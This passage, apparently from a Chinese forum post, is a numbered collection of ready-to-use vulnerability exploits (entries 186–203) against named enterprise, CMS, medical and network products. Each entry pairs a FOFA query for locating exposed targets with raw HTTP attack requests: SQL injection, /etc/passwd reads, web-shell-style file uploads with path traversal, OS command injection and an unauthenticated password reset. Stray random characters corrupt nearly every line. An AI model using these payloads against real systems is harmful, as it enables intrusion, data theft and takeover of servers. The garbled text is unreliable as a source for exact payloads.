8 w5 b* J$ I6 W; j+ c+ _version < 7.0.5.1
) u: Q+ L5 c2 I, x9 GFOFA:app="REALOR-天翼应用虚拟化系统"
. u) ?# I+ t; h" v. ~GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
' H2 H9 a8 |* {6 B0 p' L/ a$ x' CHost: host# x, w) L" l8 u; V3 s, F( r( u2 Z
( A- H- k/ |' B/ ~, a& ~0 f. U$ X5 P5 T& z
186. F-logic DataCube3 SQL注入; K8 ~$ _) `1 L1 O2 K2 P' c9 ?! U
CVE-2024-317509 b- Y: n2 n+ Y
F-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统7 \6 M/ A: t- k/ ?0 ^; s+ \& k- H
FOFA:title=="DataCube3"
/ S; ]- g2 M2 m8 j$ F, zPOST /admin/pr_monitor/getting_index_data.php HTTP/1.1
* {2 l6 j( y/ A- Z' D4 VHost: your-ip. v7 Q/ Y6 R E! ~$ L3 A" S3 p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
3 I, e# A5 _' q& ~! `6 oAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8) s& ~0 }( _4 y `5 B5 o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$ }# ~% s2 U3 M0 ]Accept-Encoding: gzip, deflate$ `5 [4 B) [% w3 r% `* N
Connection: close; A5 Y/ ?- K; P F
Content-Type: application/x-www-form-urlencoded. p! d: B/ e$ d& v- D/ V4 _2 F
9 ~$ J+ u P/ A0 K+ M% v3 r% R
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450& E. e. a" L) T. Z
" Y0 D) l- v7 \; U8 l8 X
. J2 R+ s. n8 ~, j8 b9 O187. Mura CMS processAsyncObject SQL注入
' T9 q$ N- j$ D3 y7 d. D1 cCVE-2024-32640/ j% x. l! g* A
FOFA:"Mura CMS"& ], A7 q; {2 m% J' V0 ~8 o
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1- n1 C! i& R6 X; [0 F
Host: your-ip
$ u0 t+ `$ M, vContent-Type: application/x-www-form-urlencoded6 L1 V* p+ p" \
, z/ c1 f' q8 ]' n2 j7 x, F' |
& Z' y9 `/ W% z) M' ?2 X8 ^object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1. D7 [ M/ O' d- M1 R' M, B$ l% [
' e. t: D- ~0 D1 }" h# O/ I6 y. Q B" l* _) f* |
188. 叁体-佳会视频会议 attachment 任意文件读取5 g& t/ o9 H- A
version <= 3.9.7' U: C9 R1 d( `* G) x* q
FOFA:body="/system/get_rtc_user_defined_info?site_id"
9 y. V; W! J3 q! h g! xGET /attachment?file=/etc/passwd HTTP/1.1
# ]( K- ]8 i- T* }Host: your-ip
9 u2 O7 S. S' d; jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36+ V9 v+ N! h5 @8 O5 G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 g9 c% } L6 n8 Q" M, }
Accept-Encoding: gzip, deflate% @ H7 z7 g4 r0 S6 e8 H' t. |
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
$ x9 [: k$ t6 [. i+ ZConnection: close
2 c5 K2 S5 o$ p% U& ^: T7 q% J! A( Q: `# N
7 Z3 X- Q* c/ b* p/ M; Q
189. 蓝网科技临床浏览系统 deleteStudy SQL注入3 I* S2 V/ q; n
FOFA:app="LANWON-临床浏览系统"/ b( d& x3 H) z8 i) u5 h$ {
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1, _: g K: j* ]/ }. L
Host: your-ip
9 K- p( {: `1 d3 V/ BUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36! P) o8 w5 _7 H( q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. b' j# p, d1 A
Accept-Encoding: gzip, deflate+ l Q2 R) o9 U. |2 a
Accept-Language: zh-CN,zh;q=0.98 b0 D6 y4 q* t C
Connection: close
$ ?( Z7 U% @1 `8 k" E/ B. Y; t$ }: W5 I# W9 m
( j' {3 ^1 o: b190. 短视频矩阵营销系统 poihuoqu 任意文件读取8 N# R, q% @0 p7 v$ s6 @# D
FOFA:title=="短视频矩阵营销系统"7 X* g! Z- s( Z# j" K' O; _
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
# b, D& P/ {3 a- f& Q+ P8 AHost: your-ip
! z# ]" m4 e' R+ }/ ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.366 Q8 H, E( ~, ]: ?% U( o: q, d4 q# `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.94 \. q$ E7 ~. `+ N
Content-Type: application/x-www-form-urlencoded
$ ]0 J4 I C6 z6 m# l. s$ SAccept-Encoding: gzip, deflate3 L$ x8 G2 |' T$ g8 W9 E a8 k' x
Accept-Language: zh-CN,zh;q=0.9
! o2 L# [1 _5 o' k6 c. H8 n) J% m; z3 Y; m
poi=file:///etc/passwd
8 r* G) [3 Z# s/ }7 [
2 O! _( _* G) v* U% ?' z0 I; l( I/ j7 T$ K
. t9 r7 R( L& f- O191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
( I4 [# c) F9 w. v, |) K- ~. fFOFA:body="/CDGServer3/index.jsp"+ D& Z" ^4 P7 ^# \" e0 u
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
' l, J! w7 x5 I: s& E; ~! ^* G& }Host: your-ip
0 T5 k2 f! ~( I5 aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36* i x* F- ~8 T# W
Content-Type: application/x-www-form-urlencoded
, D, l5 U) o$ k6 O; w+ {9 h' m, t' _7 p8 y' {
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=* Y8 j, a! c9 x2 R. ~
5 k* }& n- J6 V. t3 @5 e: Y; s/ M
+ v8 I% e' l c ~192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
5 y1 K" C: h7 Y2 O$ zFOFA:title="用户登录_富通天下外贸ERP"
$ H% b" s# F9 k rPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1. N. A, u3 l, r' X4 q
Host: your-ip
1 C# w p" F. CUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.369 q8 T. w9 Q$ w
Content-Type: application/x-www-form-urlencoded
; [& f& o& W5 l- l) T& X) w
* D% s) t5 o3 F3 Z, J6 i; ^: }' e0 Z% h) m
<% @ webhandler language="C#" class="AverageHandler" %>
$ d# h9 ], a! H$ }0 uusing System;
' j1 n, V# U. }# Q0 D4 cusing System.Web;. j" G* k2 a: c; @
public class AverageHandler : IHttpHandler
7 y1 _' w( a. _- x% H8 {$ P{1 t2 n7 p: i) L- ]; w9 p8 X% S% t
public bool IsReusable
# ^. b( M. P% w* o; t! G2 Q{ get { return true; } }9 `: Z b: p9 q9 M3 S1 g/ g* P
public void ProcessRequest(HttpContext ctx)* S5 u! r" u z/ ^
{* B: V& u1 z4 _9 K( H! [. F
ctx.Response.Write("test");" Y4 @0 P' c, G& [+ S8 I
}
/ o9 b1 _5 w& H- U6 d}' G' W3 q% _" _) U
" W5 r* v% H4 {# `% V5 O; C% y& m, N: b& V; p/ J& X
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
3 L- J1 d8 u3 ~' M+ W) b$ ?( [FOFA:body="山石云鉴主机安全管理系统"
* L% L+ Q' q1 L% z1 q- TGET /master/ajaxActions/getTokenAction.php HTTP/1.1+ [, D8 T3 S2 L6 G1 K* w# K
Host:
; U8 [5 k$ F" N6 ZCookie: PHPSESSID=2333333333333;
* B4 G7 n+ {. b; {7 qContent-Type: application/x-www-form-urlencoded
$ i% j& W0 W6 }+ lUser-Agent: Mozilla/5.0
4 Z6 m) g! O- k" N$ J) g3 r4 }0 m- R) g$ h5 w/ S7 j
$ U. S: t* Z9 S- f' F
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1. E! x" a9 B- {# h
Host:
1 c% N3 L8 F9 i/ J5 M5 bUser-Agent: Mozilla/5.0
( ]0 }, q: G0 [. k- _( pAccept-Encoding: gzip, deflate
1 ], j# E7 K& B) S% i& e* T7 g+ x: Y `Accept: */*; _2 d; t J2 A5 C1 @
Connection: close8 ?/ ^$ r' i5 u, C- R9 T0 Y
Cookie: PHPSESSID=2333333333333;
: Z" T: K/ S7 v9 O3 Y2 N2 [Content-Type: application/x-www-form-urlencoded1 y1 S: G8 Q2 A$ A
Content-Length: 84; `$ k" Y$ ^5 S8 M" K# G; b6 P
$ Q j+ P3 `( ?3 V* U5 T/ I
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')% w9 T2 F% b, M' J" A# V
8 |3 y) }- g6 {0 P; w+ Z. h/ G O+ P- C8 \, e; C
GET /master/img/config HTTP/1.19 I, l. `1 S* b$ ]$ A, S( ]% S
Host:
) W6 b, r/ m1 y$ mUser-Agent: Mozilla/5.0
1 }+ d; w9 }, Q: t" s. i+ c- {8 U
& p+ E# A* u7 N/ |. z3 Q
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
$ P9 `" E. A8 xFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
0 T5 J+ _( `7 p: P; X) q: F3 b: w2 R! ] Q# |
POST /servlet/uploadAttachmentServlet HTTP/1.1
9 J/ j: h. }# J, THost: host
0 F/ D" X6 d+ `& ^, E8 EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36 O$ `! G1 J$ a, |9 z5 a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" I' r3 z. W" T+ e, c2 A! @Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' C5 ?; [* E% u
Accept-Encoding: gzip, deflate% D' ^; y5 @8 `0 | k5 _; m8 _
Connection: close
: t) Z$ `0 R+ r( i6 \$ VContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk5 d1 _& C) z, n9 j: `$ w
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
5 Y* k e5 I, ~) h' V' x) m2 b" |
" V: U6 L5 a0 B3 j9 D& V2 wContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
9 {5 W# F3 G4 I6 FContent-Type: text/plain% J5 C2 T, C7 }) w$ U8 Y
<% out.println("hello");%>
7 |0 F/ t- n) t' ]% ~5 w* p( E* L------WebKitFormBoundaryKNt0t4vBe8cX9rZk6 }* Q( D4 c- [5 {4 c
Content-Disposition: form-data; name="json"
) {, X& ^% `/ O$ _) x/ T$ G {"iq":{"query":{"UpdateType":"mail"}}}
* m1 }& m z3 w- c8 D------WebKitFormBoundaryKNt0t4vBe8cX9rZk--7 n- C4 ~4 W+ j0 q% ^* Z" Q$ ^- y3 {
/ ], h" x4 W: N! A; Z
0 C7 Q1 v5 y$ s) ^0 f- e8 v" o* [195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
. ^& d J/ {; m, a0 {; UFOFA:title=="飞鱼星企业级智能上网行为管理系统8 |7 j: k! D1 U
POST /send_order.cgi?parameter=operation HTTP/1.1, x5 l0 | s/ L( |; P
Host: 127.0.0.1
; E3 R: u4 b' u$ I7 h7 uPragma: no-cache
! k) a3 _* i) B" b# B, S- M' LCache-Control: no-cache
q Q4 g8 Q; g* U0 t+ XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36! ]4 y& Z V3 d- X% P
Accept: */*
/ J& L/ E$ {8 ?9 O( T1 e% `Accept-Encoding: gzip, deflate5 C1 n9 G$ h; }, t6 f
Accept-Language: zh-CN,zh;q=0.9( s) @ u/ I( ~) ~3 ~
Connection: close
- ^7 r/ D# ^% ~* V# Y bContent-Type: application/x-www-form-urlencoded0 p6 N: m" C# M
Content-Length: 68
: e7 m+ u" f$ A4 r0 }4 I; Q
* Z; s0 \* K0 }! P' T( w{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}* O/ r" l0 Y P0 n0 a
m, g! T0 [) e2 L8 k/ O
7 Y# H, Y; b4 t196. 河南省风速科技统一认证平台密码重置
: U Q' `9 w8 \$ P) C6 NFOFA:body="/cas/themes/zbvc/js/jquery.min.js"3 B1 i8 }( {5 {# u S% u
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
1 x" n* q2 b- K, BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36% s5 h8 ~0 e/ H- _8 `2 U& P! f) _
Content-Type: application/json;charset=UTF-82 g+ W+ J; {% m$ \! w
X-Requested-With: XMLHttpRequest. E0 b$ [; l; P% D& F6 ?- [
Host:5 s" e0 j2 A2 P
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2' V( Q: r1 ?( a
Content-Length: 45+ u7 r! Z/ }1 S& a
Connection: close( K( N3 e8 `3 }/ ^ S# W
$ n* ~$ P9 I3 Y) u
{"xgh":"test","newPass":"test666","email":""}% G( E0 ~) P }% M2 ]# a
: q7 Z( i; O- H0 X
" ?+ n6 H' U4 Y; T9 I; l3 l" P& N0 u) Y0 A G+ B. C3 s i/ @
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入& A3 q8 R# X$ A1 D9 P
FOFA:app="浙大恩特客户资源管理系统"5 [ L& I" H( Z: C; W) u
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1+ J% E O$ s* {" Z9 P
Host:
4 [; [/ ~% E" B( _7 \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
5 }1 r" y" a7 o: M2 {Accept-Encoding: gzip, deflate
( Y% i' [6 @" |* M& zConnection: close l8 {+ [, I0 j0 [) |' K: g
" h& Q0 C/ V- e" \2 Y
* _; ]0 G1 H: r" t9 |. P9 }7 }5 a; S# {% M+ @$ M+ o
198. 阿里云盘 WebDAV 命令注入
c7 n0 n F4 V) i" {) CCVE-2024-29640
& k( r' |4 i2 Z0 m$ b* ZGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
6 ~4 X; l) n; w5 {% O2 ACookie: sysauth=41273cb2cffef0bb5d0653592624cf64
; b5 k% t: n; e% O/ V: WAccept: */*
% V5 c+ A+ S! r V7 ?Accept-Encoding: gzip, deflate
& i% s' M2 X$ I" x6 wAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
j; s) g F* D( H9 S) P8 WConnection: close( Z3 z. ~4 k% k: }. N5 U" [% Z( l8 k
, x& Y4 n1 R4 \3 N
! e" w! ?* H& ?0 a199. cockpit系统assetsmanager_upload接口 文件上传6 X& B% |$ l" F5 ?
1 a: W7 f) {& T1 `& J
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
* D; A3 C7 b8 K* f1 y. U7 D5 J" dGET /auth/login?to=/ HTTP/1.1
( e# b( L9 y1 n& ?+ V j7 N8 [4 C
* v& H8 C/ e+ K响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
# F2 G5 J2 K2 `1 A/ M5 j. |, e. F
9 Z/ D. q3 U' d' j; L/ R6 h2.使用刚才上一步获取到的jwt获取cookie:
. F1 t+ w) \6 ]* ~0 d8 H/ ]& W3 f* O& I
POST /auth/check HTTP/1.1
' C* L- R [4 E; H3 M# PContent-Type: application/json
3 e% P2 Z) n( `* E4 q9 M2 i3 a% W1 a* j* J, Y3 G1 J7 s
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
7 c! V# b' g. u4 Z! W" Z
) l- n: f" P" K w# |' z, }响应:200,返回值: j. G: a s5 \4 t$ X
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/4 b: u! A% F G' `
Fofa:title="Authenticate Please!"
% M) K4 a" M4 l- Q+ X4 P; BPOST /assetsmanager/upload HTTP/1.1
6 _, g% q0 d1 m8 d FContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3- m& h( H; Y0 h. y# f9 i+ Y
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92$ K' j7 @1 W* p4 l% O/ ^7 e
. `/ @" J+ v" K
-----------------------------36D28FBc36bd6feE7Fb3
! }$ E* _& z7 X+ `7 E: BContent-Disposition: form-data; name="files[]"; filename="tttt.php" H" ?/ b. [" R/ v$ F, u) A6 D
Content-Type: text/php
% s$ B8 Y; T1 a% H
2 S5 F! q8 _) C' ~2 m: k5 J<?php echo "tttt";unlink(__FILE__);?>
$ E. |8 h2 u4 N7 ~2 z. c-----------------------------36D28FBc36bd6feE7Fb3
" \& `. ]3 \! v7 pContent-Disposition: form-data; name="folder"- E( F/ V" @9 S; I3 [) c4 v
+ U. |* B$ E8 D+ R0 F
-----------------------------36D28FBc36bd6feE7Fb3--
: x' w0 A1 _. A: Z9 @5 _8 z- d9 E2 l0 a
; k$ i L( J7 h, N% I8 G; u/storage/uploads/tttt.php( Y4 N+ z5 n# U- F' H. d
- U2 G1 T% ?) ^3 W
200. SeaCMS海洋影视管理系统dmku SQL注入3 F, V: ?, s$ P1 |+ {. n0 F' C
FOFA:app="海洋CMS"
+ b& d, E1 h. K2 D2 C% r0 p$ U+ h( D" P1 jGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
# P( r% P* [2 e+ F& CCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s) W; p5 X( ], K, A" y$ y$ l
Upgrade-Insecure-Requests: 15 V) p3 C! w& w. P' T# U$ M. ^
Cache-Control: max-age=00 `, y( ]3 F, f9 Q) h+ d0 ^8 U5 L
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 e( [+ i: s6 Y- HAccept-Encoding: gzip, deflate
3 i& e7 M: m1 x' U9 NAccept-Language: zh-CN,zh;q=0.9
8 \: S. B' O$ p# q( b% ^: U
6 }, @3 g, I2 k7 A, ^* b2 v! b
8 u0 @) b; N; F7 N. w201. 方正全媒体新闻采编系统 binary SQL注入; a0 T P% ]; c. Q
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
: x; _. e$ ~& f! XPOST /newsedit/newsplan/task/binary.do HTTP/1.1
, q# F, i% [. DContent-Type: application/x-www-form-urlencoded* x. r* z# G+ ]7 u, f+ z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7; F) @* }3 b% n: o, x- _1 _, Q. t
Accept-Encoding: gzip, deflate
2 X3 S' o) d0 j* zAccept-Language: zh-CN,zh;q=0.9
" S! t2 p1 r' G5 _Connection: close
0 x* K& Z; {' |; J0 p3 Z1 ?$ I: c8 @) M
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1
j" v9 ?' A8 @9 B$ s0 I6 X& x* K7 ~0 }
) ~$ t& A) O2 p- s6 W+ y* E
202. 微擎系统 AccountEdit任意文件上传( k) p( k0 K5 p- u+ b7 X8 Q
FOFA:body="/Widgets/WidgetCollection/"5 E$ n: j9 [0 K4 K. _: X
获取__VIEWSTATE和__EVENTVALIDATION值- o5 z, o0 G! Z% P; F1 W
GET /User/AccountEdit.aspx HTTP/1.1
6 D- K1 k5 o2 lHost: 滑板人之家, ~, e, G: X: {$ Y6 g) w7 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31& ^0 @. w& s3 z' D) i5 N- Q* u
Content-Length: 0* T2 F* N2 u: m/ C# k6 G( h f
" j' K6 K* y; G& i
+ j# I0 _- I) ^$ b D, U6 H4 X4 D替换__VIEWSTATE和__EVENTVALIDATION值8 k" p: T4 x2 G0 d+ e
POST /User/AccountEdit.aspx HTTP/1.15 g3 T9 E9 C& n2 J# Z
Accept-Encoding: gzip, deflate, br
/ R V; i3 K) ]* o, v7 aContent-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
1 a+ c5 I) o% O2 U* k" f: Q" c& ~6 g$ g
-----------------------------786435874t38587593865736587346567358735687
F& X3 A6 o$ E( ], zContent-Disposition: form-data; name="__VIEWSTATE"
$ i# g4 t. Q6 @: J" u' N- [
+ g; g1 b8 v/ q$ X3 E1 Q- |__VIEWSTATE# d- b# f: I, ? \
-----------------------------786435874t38587593865736587346567358735687# ~, |& u( u3 [: p9 j
Content-Disposition: form-data; name="__EVENTVALIDATION"
4 d6 m4 `! }8 x# E0 j5 O& ^/ l+ R5 U- C. `1 y" K
__EVENTVALIDATION
3 U: I' Q" o! t \( c$ H$ y! h-----------------------------786435874t385875938657365873465673587356873 Q [9 B0 ]- g
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
( b7 F6 {* N8 |! q# {Content-Type: text/plain
8 P! e% Q5 \4 D; Z0 V( `; M. Z2 k& c) a. @
Hello World!& _: K+ I0 }( G4 b2 k5 a; D
-----------------------------786435874t38587593865736587346567358735687
+ x4 ?9 R0 j2 L8 ?3 NContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
) j0 o R$ G) i% c# j% {
1 P0 d: a3 g6 K W, h( _5 T2 a上传图片
( x# u2 n4 m, E-----------------------------786435874t385875938657365873465673587356872 A D2 U' G/ s+ e
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"4 h2 t5 A$ F7 o8 n+ w
2 ^6 f% a6 h ~1 {
5 t. ~1 R7 ^: ]: W" y; f+ F' ^-----------------------------786435874t38587593865736587346567358735687
/ T g9 i0 |/ w" o8 gContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"2 ~( @5 s1 P K5 }( [
% n0 E- L* @/ ]: j4 V: ]- o q3 V
: p& B# N8 A# d/ t$ o: K
-----------------------------786435874t38587593865736587346567358735687--8 J* V4 w5 c0 B* ?9 @
. y& @: b# e: H% h
3 Z7 S) P+ ]2 O* {' T' l/_data/Uploads/1123.txt
) c* r7 P7 `2 ^
7 J4 E% q2 e7 t l203. 红海云EHR PtFjk 文件上传4 w- e6 ]( T, {; p5 v/ J
FOFA:body="RedseaPlatform"& Z* C8 u9 t; S
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1) S" ]8 o+ R- Y
Host: x.x.x.x- V$ m: {! V1 V; x8 o) V
Accept-Encoding: gzip
& I' w2 t8 M( c: z' dUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 d- T6 i5 `' ?3 S1 g2 s: A+ }) qContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4+ ^# k" {" l* }2 a; N
Content-Length: 210
8 X) A. Y) H c
, i+ K- c4 ^% v4 U y T! @ x------WebKitFormBoundaryt7WbDl1tXogoZys4
4 O6 k+ n+ D1 [' A7 eContent-Disposition: form-data; name="fj_file"; filename="11.jsp"; \1 ^9 b, n% L0 {# {3 N
Content-Type:image/jpeg6 s3 U5 n+ w& v) e2 H, I4 D0 o* x0 X
+ p6 ]8 H3 `- S4 Z1 V* U# j<% out.print("hello,eHR");%>
2 ]0 ~ s: G0 F( V% v) o------WebKitFormBoundaryt7WbDl1tXogoZys4--
% B# I) w. W R' g" Y
8 v z$ q- F% W- P
+ Y% j, m( }: `) W
+ e& @/ p5 E: J7 d! }6 h! k( @% z, N4 I* f0 D
& }) q- F* f5 c3 S& A9 M
" y& V/ ]6 r4 }1 X" V( `7 I. N9 C8 U3 d
|
发表于 2024-6-5 14:31:29